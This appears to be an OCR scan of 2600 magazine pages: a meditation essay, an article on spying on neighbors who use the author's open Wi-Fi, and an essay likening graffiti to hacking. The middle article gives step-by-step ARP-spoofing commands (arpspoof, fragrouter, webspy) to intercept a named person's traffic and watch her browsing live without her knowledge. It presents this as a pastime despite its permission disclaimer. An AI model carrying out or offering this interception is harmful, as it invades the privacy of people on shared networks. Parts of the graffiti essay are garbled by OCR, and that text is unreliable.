2600@saizai.com
AIM, #ca2600: saizai
GPG: 0xAFF1F292

My experience has been that meditation is a subject that frequently polarizes people: some believe credulously in all kinds of unsupported nonsense, while some reject everything wholesale in the name of skepticism. However, meditation is a useful way to hack your mind state. Rather than just taking some guru's preferred version of one technique as the One True Way, you just have to get to know a variety of the techniques available, tweak them to work for your own world-view and symbol set, and understand what about them makes them actually work.

I've talked with a fair number of people about this, and one misconception that comes up often is that "meditation" exclusively means "sitting in a dark, quiet room in lotus position smelling incense and thinking about nothing." This is indeed one method of meditation, known as mushin or "empty mind." It is far from the only one, though, and it's not necessarily the best first approach for everyone, especially not for people used to multitasking, like most hackers.

Another misconception is that meditation is to be treated as something that you do only in special short periods of time. This implies that most of the time you are not in a meditative mind state, but the whole point of meditation is to change your everyday life. There certainly is a place for separate, focused meditation, but here is one class of methods I call "all-point" techniques. What makes this class of methods work is the combination of a very rich environment and the strategy of not concentrating overly on any particular piece of it. These methods are particularly well-suited to beginning one's meditation experience and to easy, everyday practice.

1. "Soft eyes"

This is a relatively common technique in martial arts. Instead of focusing on the eyes or hands of the person you are talking with (or trying to disarm), aim your eyes towards the neck area and keep a soft focus, both mentally and literally. A good way to check this technique is to ask yourself a series of questions:

• Where is their right hand and what are they holding?
• What is in their pockets? (Pants, chest, under-arm holster, buttocks...)
• How tense are the muscles around and above their eyes? Shoulders? Neck?
• How fast are they breathing?
• How are they about to move?
• Who and what is nearby? Where is the nearest exit?

The way to tell whether you're doing this right is to see if you can answer all of these questions with only minimal, if any, movement of your eyes and attention; you should be able to see all of it simultaneously. This is not an exclusively martial technique, though it's certainly useful for that; try just doing it with everyone you see. The point is to be able to notice as much as possible, without telegraphing what you are looking at and without having your attention exclusively focused on one thing. Magicians and fighters both like it when they can use misdirection to make you not notice things which are within your sight.

2. Really enjoying nature

Go somewhere you'll find beautiful. I'll use hills as an example since that's what I most enjoy, but anything vibrant will work. Normally, when most people go to "enjoy nature," they either barely notice it at all because they're distracted by equipment, their latest argument, planning the next day's work, etc.; they notice one spotlighted bit at a time; or they notice only a very vague ambiance.

Instead, try to individually see everything in detail. An easy way to do this is to start by limiting your attention to two things; for example, feeling wind on your skin and seeing the clouds move. See as much detail as you can in those two things. Then add a third, such as the feel of sunlight or the movement of a patch of grass nearby. The key lies in adding more things to your attention simultaneously without losing detail in the previously perceived ones.

This can very quickly become overwhelming; the amount of information in any natural scene is extremely dense. Even a small patch of grass will have enough movement and detail in it to swamp your multithreading. Fortunately, this is a learnable skill. With practice, you'll find that your effective threadcount and buffer size go up. As a nice bonus, the more you can really notice, the more enjoyable it is.

3. Individuals in crowds

What did you notice the last time you walked down the street? It's interesting that the amount you relate to people as individuals tends to be inversely related to the number of people present. Crowds gain a separate character of their own: it's easier to simply interpret them as a mass. This is also true in reverse; being a member of a crowd makes one less apt to empathize with others as individuals. Look up the case of Kitty Genovese for one sad example.

Next time you are out, try to notice faces, body posture, and the distances people stand from each other, rather than glazing over. Don't attach too much to each personal drama; just notice, recognize, and keep moving. The goal for this is to increase the scope of things which you can take in consciously, making a "mere" walk down the street a somewhat more alive experience. For more on recognizing facial emotions, I highly recommend the work of Paul Ekman, and for more on the significance of proximity in human interaction, I recommend The Hidden Dimension and The Silent Language, both by Edward T. Hall.

Conclusion

There are many other situations in which you can practice this "all-point" technique: while playing RTSs and other games with lots of things happening at once; while listening to complex multi-part music such as Rachmaninoff, Bach, or Godspeed You! Black Emperor; while noticing all the background sounds wherever you are, including computer fans, hard drive clicks, traffic, your own breathing, radios, neighbors, and so on; or while experiencing any environment.

The purpose of this class of techniques is to learn to be able to deal with highly multithreaded, content-rich, real-time situations in a serene manner, so you can not only experience as much of these situations as possible but also do so without being overwhelmed. This is a lot like the eventual purpose of traditional empty-mind meditation; it's just a different approach. I've given just a few ways of doing this. It's up to you to figure out one that'll be effective for you in your daily life. The more that you can integrate this way of interacting with the world as a daily habit, the more effective it'll be at shifting your baseline mind state.

If you have any feedback on this or are interested in seeing more, please contact me. I'm working on a book tentatively entitled A Hacker's Guide to Meditation: Practical Recipes Without the Dogma, which aims to be a complete guide to all known classes of effective meditation techniques (of which this article discusses just one) from a pragmatic, open-source perspective. This includes techniques traditionally taught as meditation, psychotherapy, and more. If you find this useful, or if you have a technique or variant I might not have heard of, I'd like to know. Happy mind-hacking!

Sai Emrys is a recent graduate of UC Berkeley in cognitive science, looking to do doctoral work in the neuroscience of empathy. Other interests include running the Language Creation Conference (conlangs.berkeley.edu), interpreting music in American Sign Language (YouTube saizai), coding in Ruby on Rails, and consulting on international business.
by Uriah C.

I enjoy leaving my wireless access point available for others to connect to and use the Internet. There is one catch, however: I get to play and monitor the traffic whenever I want to. In this article, I will describe a pastime that is fun and revealing of your neighbors.

I recently found a new host on my network to play with. New friends are fun! I frequently use EtherApe to quickly monitor my network traffic, and I found a new computer name on my network. Knowing that this person was on my network, I fired up nmap to do a quick ping sweep to confirm my new friend. My new friend's computer name was her real name, and I could see that she had the IP address of 192.168.1.104. The family computer was on 192.168.1.103, my laptop was on 192.168.1.101, and the access point was on 192.168.1.1.

Since I had a new friend to play with, I decided to view the traffic that was going through. Of course I could do that with EtherApe, but I wanted more than just IP addresses and URLs. Besides, I was itching to use the program webspy for a little bit. Before I go into the fun too much, let me explain what webspy is. Webspy is a program that is part of Doug Song's dsniff suite. These tools are designed to penetration test your network, and, in my case, have fun with those on my network. I must stress that this should only be done on your own network or on one for which you have been given permission to perform such tests. Now that the legal stuff is out of the way, let's get on with the fun.

The first thing I have to do is to ARP poison the host and the gateway. This way, the traffic will be routed to my computer. This is done by opening two terminal windows. In the first terminal, type:

# arpspoof -i eth1 -t 192.168.1.1 192.168.1.104

In the second terminal, type:

# arpspoof -i eth1 -t 192.168.1.104 192.168.1.1

Then, I need to make sure that I am forwarding traffic to the proper locations, so I use fragrouter. In a third terminal, type:

# fragrouter -i eth1 -B1

Now let's see what this does. The first arpspoof command sends forged arp information over the interface (-i) eth1 to the target (-t) 192.168.1.1 that my computer is 192.168.1.104, while the second terminal tells the target 192.168.1.104 that my computer is 192.168.1.1. Meanwhile, fragrouter sends the broadcast address (-B1) all traffic that has come in, so there is no interruption of service.

Now, it's time for the last few steps. I need to run webspy and open a browser. Then, I can have the fun of seeing whatever someone else sees. So, I would open up two more terminals. In the fourth terminal, type:

# webspy -i eth1 192.168.1.104

And, finally, in the fifth terminal, type:

# firefox &

Now, Firefox opens up, and I get to see the websites that my new friend opens up in real time. I've only seen one problem: if an ad pops up on a separate page from the rest of a website, it'll be shown separately from the rest of the original site. So, if my friend goes to MySpace, then I see MySpace, but it quickly flashes over to show just the ad without the rest of the site. I have my browser set to open these ads in different tabs, so I can see the page and the ad. You never know what kind of sites others may visit, so you should do this with discretion, especially if the kids are running around the house and the material coming up is questionable.
  • 25. . A ��/1 4T �� by scOut64 scOut64@yahoo.ca I find that one of my longest-run n i ng fasci nations, computer hacki ng, has a lot to do with my greatest passion and hobby, graffiti a rt. These are two very controversial subjects, and discussing them can usua l ly generate a great response, depending on who you ask. Th is is not a how-to article by any means, but rather a way to shed some l ight on the s i m i larities between two of my favorite pasti mes. B ut I ' l l sti l l include the standard d i sclaimer that getting caught participating i n either of these activities m ight get you in trouble. The fi rst thing I can fi nd these two subjects have in common is the reaction that you get when you tel l someone that you do one or the other. If you tel l someone you ' re a computer hacker, you can usual l y expect confused or wary looks. People assume that you 've done shady thi ngs before, and they approach conversation choosing thei r words carefu l ly, assum i ng that you m ight take some of the i nformation and use it agai n st them. They m ight not be aware that the hacking you do m ight be completely l ega l . You m ight be a pen tester for a security firm, or you j ust m ight l i ke ru n n i ng wargames on your network with your friends. It depends on you r defi n ition of a hacker. S i m i larly, when you tel l someone that you ' re a graffiti artist, some peopl e automatical l y assume that you ' re a vandal . They th i n k you ' re one o f those stereotypical guys who tags u p convenience stores at night, or that you ' re one of the people who vandal i zed a l l those New York City trains years ago. They m ight th i n k that you r bedroom is a mess and that a l l you r schoolbooks are scribbled on. They may not rea l ize that there are plenty of l egal areas to tag up and that what you do fal l s completely with i n the law, or that you m ight be a graphic design student whose style is completely d igita l . 
It depends on your definition of graffiti.

Another similarity between these two areas is legality. Graffiti writing really came into popularity in the 70s and 80s in New York City. Yes, it caused all kinds of chaos, and many people were penalized once the city implemented graffiti laws. Like many great things, because it was new and brought change, people didn't like it. Likewise, when hacking started becoming extremely popular, there were no laws or governing bodies to regulate what went on. With these two cultures and many others, once the government felt things got a little too out of control, they stepped in and "supervised."

There are a number of other similarities between the two fields:

• Some ways of participating in these activities are illegal and carry penalties of various kinds.
• You need permission for participation to be legal. You can't just 0wn your friend's b0x any more than you can tag up his room; you need to have an OK from him first.
• There are contests. These are great for intellectual stimulation, learning, meeting new people, and challenging yourself.
• There are a lot of graffiti-based themes in computer hacking and in video games. Clan tags and sigs have gotten very, very cool.
• Depending on who you ask, both can be considered either vandalism and crime or art and expression.
• An interest in either field can lead to a great career.
• Sometimes, both practices involve going places you're not supposed to go.
• Sometimes, you have to come back to the same places to finish what you started.

There are more similarities, but you get the idea. Graffiti and hacking have evolved into distinct cultures; just like every culture, you have good people and bad people. People come and go, but the culture survives. Legal or not, these activities will still go on. The question still remains: how will you represent your culture?

Shouts: Adict, Kiwi, www.worldwideblackbookproject.com

Summer 2008 ------------------- Page 25
